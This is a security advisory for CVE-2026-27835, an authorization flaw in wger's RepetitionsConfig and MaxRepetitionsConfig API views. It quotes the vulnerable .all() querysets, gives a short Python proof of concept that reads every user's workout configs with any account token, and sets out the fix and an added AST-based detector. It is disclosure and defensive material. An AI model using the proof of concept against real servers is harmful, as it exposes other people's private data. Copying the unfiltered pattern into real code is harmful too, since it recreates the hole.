
wger: Access to Other Users' Workout Data

CVE-2026-27835 GHSA-xf68-8hjw-7mpm
Summary

A missing authorization check in wger lets any registered user view the workout data of other users. This is a security risk because it exposes sensitive information about other users' fitness routines. To fix it, the wger developers need to update the RepetitionsConfig and MaxRepetitionsConfig API views to filter the data by the currently logged-in user, just as the other views already do.

What to do

No fix is available yet. Check with your software vendor for updates.

Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| wger | | <= 2.1 | |
| wger | wger | <= 2.4 | |
Original title
wger: IDOR in RepetitionsConfig and MaxRepetitionsConfig API leak other users' workout data
Original description
### Summary

`RepetitionsConfigViewSet` and `MaxRepetitionsConfigViewSet` return all users' repetition config data because their `get_queryset()` calls `.all()` instead of filtering by the authenticated user. Any registered user can enumerate every other user's workout structure.

### Details

`wger/manager/api/views.py:499` and `:518`:

```python
# VULNERABLE
class RepetitionsConfigViewSet(viewsets.ModelViewSet):
    def get_queryset(self):
        return RepetitionsConfig.objects.all()


class MaxRepetitionsConfigViewSet(viewsets.ModelViewSet):
    def get_queryset(self):
        return MaxRepetitionsConfig.objects.all()
```

Every sibling viewset in the same file correctly filters by user. For example, `WeightConfigViewSet` at line 459:

```python
# CORRECT — how it should work
def get_queryset(self):
    return WeightConfig.objects.filter(
        slot_entry__slot__day__routine__user=self.request.user
    )
```

The same user filter is present on `SetsConfig`, `RestConfig`, `RiRConfig`, and their Max variants — only `RepetitionsConfig` and `MaxRepetitionsConfig` are missing it.

### PoC

```python
import requests

BASE = "http://localhost"
headers = {"Authorization": "Token YOUR_TOKEN"} # any registered user

r = requests.get(f"{BASE}/api/v2/repetitions-config/", headers=headers)
print(r.json()) # returns ALL users' repetition configs, not just your own

r = requests.get(f"{BASE}/api/v2/max-repetitions-config/", headers=headers)
print(r.json()) # same — all users' max repetition configs
```

Registration is open by default. Sequential IDs allow full enumeration.

### Impact

Any authenticated user can read other users' repetition and max-repetitions configs, exposing workout structure (slot entry IDs, iteration values, operations, step counts, repeat flags, requirements JSON). This is a broken object-level authorization (BOLA/IDOR) vulnerability — the same class of issue as OWASP API1.

**Fix**: Add the same user filter used by every other config viewset:

```python
def get_queryset(self):
    return RepetitionsConfig.objects.filter(
        slot_entry__slot__day__routine__user=self.request.user
    )
```
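The report found the bug by comparing `get_queryset()` across sibling viewsets. The following added example (not part of the advisory or of wger's code base) automates that comparison with Python's `ast` module: it flags any `ModelViewSet` subclass whose `get_queryset()` returns `Model.objects.all()` with no filter. The `SAMPLE_VIEWS` source is constructed from the snippets above; it is a heuristic and will not catch a queryset filtered on something other than the requesting user.

```python
import ast

# Constructed sample modelled on the snippets in this advisory, not wger's real views.py.
SAMPLE_VIEWS = '''
class RepetitionsConfigViewSet(viewsets.ModelViewSet):
    def get_queryset(self):
        return RepetitionsConfig.objects.all()

class WeightConfigViewSet(viewsets.ModelViewSet):
    def get_queryset(self):
        return WeightConfig.objects.filter(
            slot_entry__slot__day__routine__user=self.request.user
        )

class MaxRepetitionsConfigViewSet(viewsets.ModelViewSet):
    def get_queryset(self):
        return MaxRepetitionsConfig.objects.all()
'''


def _returns_unfiltered_all(func: ast.FunctionDef) -> bool:
    """True if any `return` in the function is a bare `<Model>.objects.all()` call."""
    for node in ast.walk(func):
        if not isinstance(node, ast.Return) or not isinstance(node.value, ast.Call):
            continue
        callee = node.value.func
        if (isinstance(callee, ast.Attribute) and callee.attr == "all"
                and isinstance(callee.value, ast.Attribute)
                and callee.value.attr == "objects"):
            return True
    return False


def find_unscoped_viewsets(source: str) -> list[str]:
    """Names of ModelViewSet subclasses whose get_queryset() has no filter at all."""
    findings = []
    for cls in ast.walk(ast.parse(source)):
        if not isinstance(cls, ast.ClassDef):
            continue
        if not any(ast.unparse(b).endswith("ModelViewSet") for b in cls.bases):
            continue
        for item in cls.body:
            if isinstance(item, ast.FunctionDef) and item.name == "get_queryset":
                if _returns_unfiltered_all(item):
                    findings.append(cls.name)
    return findings


if __name__ == "__main__":
    for name in find_unscoped_viewsets(SAMPLE_VIEWS):
        print(f"{name}: get_queryset() returns .objects.all() with no user filter")
```

Run it against a real `views.py` by reading the file into `find_unscoped_viewsets`; each reported class should then be checked by hand for an object-level ownership filter.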
NVD CVSS 3.1: 4.3
Vulnerability type: CWE-639 Authorization Bypass Through User-Controlled Key
Published: 26 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026